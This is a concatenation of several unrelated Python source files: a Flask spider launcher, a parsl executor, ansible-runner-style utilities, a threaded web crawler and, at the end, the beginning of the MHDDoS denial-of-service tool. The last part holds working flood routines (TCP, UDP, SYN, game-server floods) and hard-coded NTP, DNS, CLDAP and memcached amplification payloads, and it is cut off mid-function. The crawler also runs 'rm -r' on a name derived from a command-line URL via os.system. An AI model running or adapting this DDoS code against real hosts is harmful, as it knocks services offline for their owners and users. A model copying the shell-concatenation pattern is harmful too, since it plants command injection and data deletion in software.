print('exiting.')
GPIO.cleanup()
finally:
print('exiting.')
GPIO.cleanup()
if __name__ == "__main__":
#test_job_handler()
test_movment_multiprocessing()
#test_movement_subprocess()
|
app.py
|
from flask import Flask
from MOOC.spiders.mooc_spider import Moocspider
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from multiprocessing import Process
from flask_cors import *
app = Flask(__name__, static_folder='frontend')
CORS(app, supports_credentials=True)
def run_spider(course):
process = CrawlerProcess(get_project_settings())
process.crawl(Moocspider, urls=[course], video=0)
process.start()
@app.route("/course/<course>", methods=['GET'])
def spider(course):
p = Process(target=run_spider, args=(course, ))
p.start()
p.join()
return f"Spider is crawling: {course}"
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8081, debug=True)
|
executor.py
|
"""LowLatencyExecutor for low latency task/lambda-function execution
"""
from concurrent.futures import Future
import logging
import threading
import queue
# import pickle
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.low_latency import zmq_pipes
from parsl.executors.low_latency import interchange
from parsl.executors.errors import ScalingFailed, DeserializationError, BadMessage
from parsl.executors.base import ParslExecutor
# from parsl.dataflow.error import ConfigurationError
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class LowLatencyExecutor(ParslExecutor, RepresentationMixin):
"""
TODO: docstring for LowLatencyExecutor
"""
def __init__(self,
label='LowLatencyExecutor',
provider=LocalProvider(),
launch_cmd=None,
address="127.0.0.1",
worker_port=None,
worker_port_range=(54000, 55000),
interchange_port_range=(55000, 56000),
# storage_access=None,
working_dir=None,
worker_debug=False,
workers_per_node=1,
# cores_per_worker=1.0,
managed=True
):
logger.debug("Initializing LowLatencyExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
# self.storage_access = storage_access if storage_access is not None else []
# if len(self.storage_access) > 1:
# raise ConfigurationError('Multiple storage access schemes are not supported')
self.working_dir = working_dir
self.managed = managed
self.blocks = []
self.tasks = {}
self.workers_per_node = workers_per_node
self._task_counter = 0
self.address = address
self.worker_port = worker_port
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.run_dir = '.'
# TODO: add debugging, logdir, other functionality to workers
if not launch_cmd:
self.launch_cmd = """lowlatency_worker.py -n {workers_per_node} --task_url={task_url} --logdir={logdir}"""
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing(
"127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming(
"127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}"
.format(self._queue_management_thread))
if self.provider:
# debug_opts = "--debug" if self.worker_debug else ""
l_cmd = self.launch_cmd.format( # debug=debug_opts,
task_url=self.worker_task_url,
workers_per_node=self.workers_per_node,
logdir="{}/{}".format(self.run_dir, self.label))
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = self.provider.scaling_enabled
logger.debug(
"Starting LowLatencyExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
for i in range(self.provider.init_blocks):
block = self.provider.submit(
self.launch_cmd, 1, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
else:
self._scaling_enabled = False
logger.debug("Starting LowLatencyExecutor with no provider")
def _start_local_queue_process(self):
""" TODO: docstring """
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port),
"worker_port": self.worker_port,
"worker_port_range": self.worker_port_range
# TODO: logdir and logging level
})
self.queue_proc.start()
try:
worker_port = comm_q.get(block=True, timeout=120)
logger.debug(
"Got worker port {} from interchange".format(worker_port))
except queue.Empty:
logger.error(
"Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(
self.address, worker_port)
def _start_queue_management_thread(self):
""" TODO: docstring """
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(
target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def _queue_management_worker(self):
""" TODO: docstring """
logger.debug("[MTHREAD] queue management worker starting")
while True:
task_id, buf = self.incoming_q.get() # TODO: why does this hang?
msg = deserialize_object(buf)[0]
# TODO: handle exceptions
task_fut = self.tasks[task_id]
logger.debug("Got response for task id {}".format(task_id))
if "result" in msg:
task_fut.set_result(msg["result"])
elif "exception" in msg:
# TODO: handle exception
pass
elif 'exception' in msg:
logger.warning("Task: {} has returned with an exception")
try:
s, _ = deserialize_object(msg['exception'])
exception = ValueError("Remote exception description: {}".format(s))
task_fut.set_exception(exception)
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage(
"Message received is neither result nor exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def submit(self, func, *args, **kwargs):
""" TODO: docstring """
self._task_counter += 1
task_id = self._task_counter
logger.debug(
"Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
# Post task to the the outgoing queue
self.outgoing_q.put(task_id, fn_buf)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by the number of blocks specified.
Parameters
----------
blocks : int
# of blocks to scale out. Default=1
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
block = self.provider.submit(
self.launch_cmd, 1, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Raises:
NotImplementedError
"""
to_kill = self.blocks[:blocks]
if self.provider:
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = []
if self.provider:
status = self.provider.status(self.blocks)
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.warning("Attempting LowLatencyExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.warning("Finished LowLatencyExecutor shutdown attempt")
return True
|
Tools.py
|
import time
from threading import Thread
class Tools(object):
def __init__(self, api) :
self.__api = api
def WaitForReady(self) :
while True:
time.sleep(5)
if (self.__api.GetOperationMode() == 0) :
print("Ready")
break
def StartLogging(self) :
t = Thread(target=self._Log, args=())
t.start()
def _Log(self) :
self._LogMessages()
self._LogErrorsAndWarnings()
def _LogMessages(self) :
while (True) :
while (self.__api.HasMessage()) :
message = self.__api.GetMessage()
if(len(message)) == 3 :
print(message[0] + " " + message[1] + " " + message[2])
else :
print("??? wrong message format ???")
time.sleep(0.1)
def _LogErrorsAndWarnings(self) :
while (True) :
if (self.__api.HasErrors()) :
errors = self.__api.GetErrors()
for error in errors :
print("Error: " + error)
if (self.__api.HasWarnings()) :
warnings = self.__api.GetWarnings()
for warning in warnings :
print("Warning: " + warning)
time.sleep(10)
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
|
main.py
|
from crawl_bot import Crawl_bot
from file_manage import *
from queue import Queue
import threading, sys, os
from get_domains import *
import tldextract
def input_url(base_url):
global BASE_URL, regex
BASE_URL=base_url
url_extract = tldextract.extract(BASE_URL)
regex = url_extract.domain
delete = str('rm -r ' + regex)
os.system(delete)
if __name__=='__main__':
if (len(sys.argv) == 2):
input_url(sys.argv[1])
else:
print("Invalid input")
GET_DOMAIN = get_domain_name(BASE_URL)
FOLDER_NAME = 'hacking/' + regex
data_crawled = FOLDER_NAME + '/crawled.txt'
data_in_queue = FOLDER_NAME + '/queue.txt'
thread_count = 50
queue = Queue()
Crawl_bot(FOLDER_NAME, BASE_URL, GET_DOMAIN)
def do_job(): # Get the job done
while True:
url = queue.get()
Crawl_bot.crawl_page(threading.current_thread().name, url)
queue.task_done()
def queue_jobs(): # Define each queued link as a new job
for url_link in convert_to_set(data_in_queue):
queue.put(url_link)
queue.join()
initiate_bot()
def get_links_to_queue(): # Also used to create threads to work
for _ in range(thread_count):
thread = threading.Thread(target=do_job)
thread.daemon = True
thread.start()
def initiate_bot(): # Does the crawling job
links_in_queue = convert_to_set(data_in_queue)
if len(links_in_queue) > 0:
print(str(len(links_in_queue)) + ' queued links')
queue_jobs()
get_links_to_queue()
initiate_bot()
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return str(ProxyTools.Tools.rand_char(lengh)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(60)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
